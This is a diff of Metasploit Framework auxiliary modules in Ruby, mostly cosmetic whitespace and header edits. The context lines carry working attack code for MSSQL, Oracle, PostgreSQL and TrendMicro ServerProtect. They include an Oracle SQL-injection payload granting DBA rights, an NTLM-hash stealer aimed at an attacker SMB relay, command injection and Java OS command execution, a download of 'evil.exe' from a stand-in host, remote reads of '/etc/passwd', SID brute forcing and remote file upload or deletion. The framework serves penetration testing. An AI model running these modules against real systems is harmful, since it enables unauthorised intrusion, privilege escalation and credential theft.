vernum = sqlversion.gsub("\n"," ").scan(/SQL Server\s*(200\d)/m)
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -72,14 +75,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#checking for C2 Audit Mode
|
||||
if sysconfig['c2 audit mode'] == 1
|
||||
print_status("\tC2 Audit Mode is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "C2 Audit Mode is Enabled")
|
||||
else
|
||||
print_status("\tC2 Audit Mode is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -125,14 +128,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#check if remote access is enabled
|
||||
if sysconfig['remote access'] == 1
|
||||
print_status("\tremote access is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "remote access is Enabled")
|
||||
else
|
||||
print_status("\tremote access is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -142,14 +145,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#check if updates are allowed
|
||||
if sysconfig['allow updates'] == 1
|
||||
print_status("\tallow updates is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "allow updates is Enabled")
|
||||
else
|
||||
print_status("\tallow updates is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -267,7 +270,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if syslogins != nil
|
||||
syslogins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -438,7 +441,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if sameasuser != nil
|
||||
sameasuser.each do |up|
|
||||
print_status("\t#{up.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -464,7 +467,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if blankpass != nil
|
||||
blankpass.each do |up|
|
||||
print_status("\t#{up.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -686,7 +689,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
fountsp.each do |strp|
|
||||
if dangeroussp.include?(strp.strip)
|
||||
print_status("\t#{strp.strip}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -714,7 +717,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
mssql_query(querykey)[:rows].each do |i|
|
||||
instances << i[1]
|
||||
end
|
||||
end
|
||||
end
|
||||
print_status("Instances found on this server:")
|
||||
instancenames = []
|
||||
if instances != nil
|
||||
|
@ -15,7 +15,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SQL Server Generic Query',
|
||||
@ -33,12 +33,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SQL', [ false, 'The SQL query to execute', 'select @@version']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
mssql_query(datastore['SQL'], true) if mssql_login_datastore
|
||||
disconnect
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -14,7 +14,7 @@ require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
@ -36,13 +36,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Jan 13 2009'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']),
|
||||
OptString.new('USER', [ false, 'The current user. ', 'SCOTT']),
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']),
|
||||
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
|
||||
|
||||
|
||||
], self.class)
|
||||
end
|
||||
|
||||
@ -58,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
function1 = %Q|
|
||||
CREATE OR REPLACE PROCEDURE #{name1}
|
||||
AUTHID CURRENT_USER AS
|
||||
PRAGMA AUTONOMOUS_TRANSACTION;
|
||||
BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';
|
||||
PRAGMA AUTONOMOUS_TRANSACTION;
|
||||
BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';
|
||||
END;
|
||||
|
|
||||
|
||||
@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
|
||||
|
||||
prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)"
|
||||
|
||||
|
||||
exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\""
|
||||
|
||||
|
||||
exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')"
|
||||
|
||||
|
||||
fun1 = Rex::Text.encode_base64(function1)
|
||||
fun2 = Rex::Text.encode_base64(function2)
|
||||
prp = Rex::Text.encode_base64(prepare)
|
||||
exp1 = Rex::Text.encode_base64(exploiting1)
|
||||
exp2 = Rex::Text.encode_base64(exploiting2)
|
||||
|
||||
|
||||
|
||||
sql = %Q|
|
||||
DECLARE
|
||||
@ -117,10 +117,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
|
||||
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sql)
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -20,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
To do this you must firstly run smb_sniffer or smb_relay module on your sever.
|
||||
Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb
|
||||
which will connect to your SMB sever with credentials of Oracle RDBMS.
|
||||
So if smb_relay is working, you will get Administrator access to server which
|
||||
So if smb_relay is working, you will get Administrator access to server which
|
||||
runs Oracle. If not than you can decrypt HALFLM hash.
|
||||
},
|
||||
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
|
||||
@ -32,9 +36,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Apr 7 2009'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]),
|
||||
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Name' => 'Oracle Account Discovery.',
|
||||
'Description' => %q{
|
||||
This module uses a list of well known default authentication credentials
|
||||
to discover easily guessed accounts.
|
||||
to discover easily guessed accounts.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -10,7 +14,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::ORACLE
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle SQL Generic Query',
|
||||
@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Dec 7 2007'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SQL', [ false, 'The SQL to execute.', 'select * from v$version']),
|
||||
], self.class)
|
||||
@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
rescue => e
|
||||
return
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -11,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::ORACLE
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle Database Enumeration',
|
||||
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
print_status("Running Oracle Enumeration....")
|
||||
|
||||
|
||||
#Version Check
|
||||
query = 'select * from v$version'
|
||||
ver = prepare_exec(query)
|
||||
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("\t#{v.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{v.chomp}")
|
||||
end
|
||||
|
||||
|
||||
#Saving Major Release Number for other checks
|
||||
majorrel = ver[0].scan(/Edition Release (\d*)./)
|
||||
|
||||
@ -77,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Security Settings
|
||||
print_status("Security Settings:")
|
||||
@ -129,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("It appears you do not have sufficient rights to perform the check")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
query = %Q|
|
||||
SELECT limit
|
||||
@ -146,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("It appears you do not have sufficient rights to perform the check")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
query = %Q|
|
||||
SELECT limit
|
||||
@ -163,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("It appears you do not have sufficient rights to perform the check")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
query = %Q|
|
||||
SELECT limit
|
||||
@ -245,7 +249,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if majorrel.join.to_i < 11
|
||||
|
||||
query = %Q|
|
||||
SELECT name, password
|
||||
SELECT name, password
|
||||
FROM sys.user$
|
||||
where password != 'null' and type# = 1 and astatus = 0
|
||||
|
|
||||
@ -278,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
begin
|
||||
if majorrel.join.to_i < 11
|
||||
query = %Q|
|
||||
SELECT username, password
|
||||
SELECT username, password
|
||||
FROM dba_users
|
||||
WHERE account_status = 'EXPIRED & LOCKED'
|
||||
|
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -15,9 +19,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an authentication bypass vulnerability
|
||||
in login.php in order to execute arbitrary code via a command injection
|
||||
vulnerability in property_box.php. This module was tested
|
||||
This module exploits an authentication bypass vulnerability
|
||||
in login.php in order to execute arbitrary code via a command injection
|
||||
vulnerability in property_box.php. This module was tested
|
||||
against Oracle Secure Backup version 10.3.0.1.0 (Win32).
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
@ -44,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
cmd = datastore['CMD']
|
||||
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => '/login.php',
|
||||
@ -57,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sessionid = res.headers['Set-Cookie'].split(';')[0]
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}...")
|
||||
|
||||
|
||||
send_request_cgi(
|
||||
{
|
||||
'uri' => '/property_box.php',
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -10,7 +14,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::ORACLE
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle Java execCommand (Win32)',
|
||||
@ -26,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Dec 7 2007'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),
|
||||
], self.class)
|
||||
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
"
|
||||
|
||||
procedure = "
|
||||
create or replace procedure #{name} (p_command in varchar2)
|
||||
create or replace procedure #{name} (p_command in varchar2)
|
||||
as language java
|
||||
name '#{source}.execCommand (java.lang.String)';
|
||||
"
|
||||
@ -61,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
drops = "drop java source #{source}"
|
||||
|
||||
dropp = "drop procedure #{name}"
|
||||
dropp = "drop procedure #{name}"
|
||||
|
||||
begin
|
||||
print_status("Creating java source '#{source}'...")
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -10,7 +14,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::ORACLE
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle URL Download',
|
||||
@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Feb 2003'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URL', [ false, 'The URL to download the binary from.', 'http://www.meh.com/evil.exe']),
|
||||
OptString.new('COPYTO', [ false, 'Location to copy the binary to', 'c:\\meh.exe']),
|
||||
@ -66,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)';
|
||||
"
|
||||
|
||||
exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"
|
||||
|
||||
exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"
|
||||
|
||||
drops = "drop java source SRC_FILE_UPLOAD"
|
||||
|
||||
dropp = "drop procedure PROC_FILEUPLOAD"
|
||||
dropp = "drop procedure PROC_FILEUPLOAD"
|
||||
|
||||
begin
|
||||
print_status("Creating java source 'SRC_FILE_UPLOAD'...")
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -28,12 +32,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Jan 7 2009'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1521),
|
||||
OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']),
|
||||
OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1521),
|
||||
OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']),
|
||||
OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
@ -43,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
list = datastore['SIDFILE']
|
||||
|
||||
print_status("Starting brute force on #{rhost}, using sids from #{list}...")
|
||||
|
||||
|
||||
fd = File.open(list).each do |sid|
|
||||
|
||||
|
||||
login = "(DESCRIPTION=(CONNECT_DATA=(SID=#{sid})(CID=(PROGRAM=)(HOST=MSF)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=#{rhost})(PORT=#{rport})))"
|
||||
|
||||
pkt = tns_packet(login)
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -24,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Version' => '$Revision$',
|
||||
'DisclosureDate' => 'Feb 1 2009'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1521),
|
||||
OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']),
|
||||
@ -42,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Sending '#{command}' to #{rhost}:#{rport}")
|
||||
sock.put(pkt)
|
||||
print_status("writing #{pkt.length} bytes.")
|
||||
|
||||
|
||||
sleep(0.5)
|
||||
|
||||
print_status("reading")
|
||||
@ -52,6 +56,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
res = res.tr("\177",".")
|
||||
puts res
|
||||
|
||||
disconnect
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Pop2
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'UoW pop2d Remote File Retrieval Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the FOLD command of the
|
||||
|
@ -15,7 +15,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Postgres
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'PostgreSQL Server Generic Query',
|
||||
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd'])
|
||||
], self.class)
|
||||
|
||||
deregister_options( 'SQL', 'RETURN_ROWSET' )
|
||||
deregister_options( 'SQL', 'RETURN_ROWSET' )
|
||||
end
|
||||
|
||||
def rhost
|
||||
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def rport
|
||||
datastore['RPORT']
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
ret = postgres_read_textfile(datastore['RFILE'])
|
||||
verbose = datastore['VERBOSE']
|
||||
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
|
||||
end
|
||||
when :complete
|
||||
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
|
||||
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
|
||||
end
|
||||
postgres_logout if self.postgres_conn
|
||||
end
|
||||
|
@ -15,7 +15,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Postgres
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'PostgreSQL Server Generic Query',
|
||||
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
|
||||
register_options( [ ], self.class) # None needed.
|
||||
register_options( [ ], self.class) # None needed.
|
||||
end
|
||||
|
||||
def rhost
|
||||
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def rport
|
||||
datastore['RPORT']
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
ret = postgres_query(datastore['SQL'],datastore['RETURN_ROWSET'])
|
||||
verbose = datastore['VERBOSE']
|
||||
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
when :sql_error
|
||||
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
|
||||
when :complete
|
||||
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
|
||||
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
|
||||
end
|
||||
postgres_logout if self.postgres_conn
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Rex::Platforms::Windows
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'TrendMicro ServerProtect File Access',
|
||||
'Description' => %q{
|
||||
This modules exploits a remote file access flaw in the ServerProtect Windows
|
||||
@ -47,25 +47,23 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'list' ]
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(5168),
|
||||
OptString.new('RPATH',
|
||||
[
|
||||
false,
|
||||
"The remote filesystem path",
|
||||
nil
|
||||
]
|
||||
),
|
||||
OptString.new('LPATH',
|
||||
[
|
||||
false,
|
||||
"The local filesystem path",
|
||||
nil
|
||||
]
|
||||
),
|
||||
], self.class)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(5168),
|
||||
OptString.new('RPATH',
|
||||
[
|
||||
false,
|
||||
"The remote filesystem path",
|
||||
nil
|
||||
]),
|
||||
OptString.new('LPATH',
|
||||
[
|
||||
false,
|
||||
"The local filesystem path",
|
||||
nil
|
||||
]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check_option(name)
|
||||
@ -73,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
raise RuntimeError, "The #{name} parameter is required by this option"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def auxiliary_commands
|
||||
{
|
||||
{
|
||||
"delete" => "Delete a file",
|
||||
"download" => "Download a file",
|
||||
"upload" => "Upload a file",
|
||||
@ -92,15 +90,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
when 'upload'
|
||||
check_option('RPATH')
|
||||
check_option('LPATH')
|
||||
cmd_upload(datastore['RPATH'], datastore['LPATH'])
|
||||
cmd_upload(datastore['RPATH'], datastore['LPATH'])
|
||||
when 'delete'
|
||||
check_option('RPATH')
|
||||
cmd_delete(datastore['RPATH'])
|
||||
cmd_delete(datastore['RPATH'])
|
||||
when 'list'
|
||||
check_option('RPATH')
|
||||
cmd_list(datastore['RPATH'])
|
||||
else
|
||||
print_error("Unknown action #{action.name}")
|
||||
print_error("Unknown action #{action.name}")
|
||||
end
|
||||
end
|
||||
|
||||
@ -110,9 +108,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
#
|
||||
# Once this function is used, if cmd_download or cmd_upload is called the server will crash :/
|
||||
#
|
||||
#
|
||||
def cmd_list(*args)
|
||||
|
||||
|
||||
if (args.length < 1)
|
||||
print_status("Usage: list folder")
|
||||
return
|
||||
@ -126,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# FindFirstFile
|
||||
resp = serverprotect_rpccmd(131080, data, 0x100)
|
||||
return if not resp
|
||||
|
||||
|
||||
if resp.length != 0x108
|
||||
print_status("An unknown error occured while calling FindFirstFile.")
|
||||
return
|
||||
@ -143,7 +141,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
file = deunicode(resp[0x30, 0xd0])
|
||||
print("#{file}\n")
|
||||
|
||||
|
||||
data = "\0" * 0x100
|
||||
data[0,4] = [handle].pack('V')
|
||||
|
||||
@ -151,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# FindNextFile
|
||||
resp = serverprotect_rpccmd(131081, data, 0x100)
|
||||
return if not resp
|
||||
|
||||
|
||||
if resp.length != 0x108
|
||||
print_status("An unknown error occured while calling FindFirstFile.")
|
||||
break
|
||||
@ -174,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def cmd_delete(*args)
|
||||
|
||||
|
||||
if (args.length == 0)
|
||||
print_status("Usage: delete c:\\windows\\system.ini")
|
||||
return
|
||||
@ -183,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
data = Rex::Text.to_unicode(args[0]+"\0")
|
||||
resp = serverprotect_rpccmd(131077, data, 4)
|
||||
return if not resp
|
||||
|
||||
|
||||
if (resp.length == 12)
|
||||
ret, = resp[8,4].unpack('V')
|
||||
|
||||
@ -198,12 +196,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def cmd_download(*args)
|
||||
|
||||
|
||||
if (args.length < 2)
|
||||
print_status("Usage: download remote_file local_file")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
# GENERIC_READ: 0x80000000
|
||||
# FILE_SHARE_READ: 1
|
||||
# OPEN_EXISTING: 3
|
||||
@ -231,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def cmd_upload(*args)
|
||||
|
||||
|
||||
if (args.length < 2)
|
||||
print_status("Usage: upload local_file remote_file")
|
||||
return
|
||||
@ -271,7 +269,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
resp = serverprotect_rpccmd(131073, data, 540)
|
||||
return if not resp
|
||||
|
||||
|
||||
if (resp.length < 548)
|
||||
print_status("An unknown error occurred while calling CreateFile.")
|
||||
return 0
|
||||
@ -363,7 +361,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
padding = ""
|
||||
end
|
||||
|
||||
stub =
|
||||
stub =
|
||||
NDR.long(cmd) +
|
||||
NDR.long(data.length) +
|
||||
data +
|
||||
@ -373,14 +371,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
